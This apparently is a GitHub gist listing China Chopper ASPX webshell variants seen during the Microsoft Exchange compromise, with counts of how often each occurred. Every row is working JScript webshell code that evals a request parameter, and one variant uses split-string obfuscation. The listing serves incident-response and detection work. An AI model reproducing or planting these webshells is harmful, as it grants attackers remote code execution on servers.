Created
March 5, 2021 18:44
-
-
Save JohnHammond/e3053768a06f1ba115c1efbd3a71103d to your computer and use it in GitHub Desktop.
Microsoft Exchange Incident "China Chopper" ASPX Webshell source
We can make this file beautiful and searchable if this error is corrected: Illegal quoting in line 2.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Occurrences, WebShell Source | |
| 190, <script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script> | |
| 50, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script> | |
| 11, <script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script> | |
| 7, <script language="JScript" runat="server">function Page_Load(){eval(Request["error"],"unsafe");}</script> | |
| 5, <script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["7gHQRih3fnam"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["coStWhkzUF7n"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["E9RyGFIM8h3S"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EiH4yV2WGYgc"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EU2JscRCQnpa"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["fCbIUAoHD4Ra"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["fdvre6YOy2WI"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["GKVWDMrzCtXn"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["Hjom79sRZQuM"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["iDrUyVPJ8uFH"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["IM07una1zNYd"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["iOnzSBXdA2FP"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["J5IgrSjbYlGq"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["JRt9ipAqmSXW"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["M95jU7cHdux3"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["NVCproEij1Fu"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsa"+"fe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["VM59yu6U3WhN"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["wkCVbHqZmRM2"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["ZvDUW9RxAnqu"],"unsafe");}</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment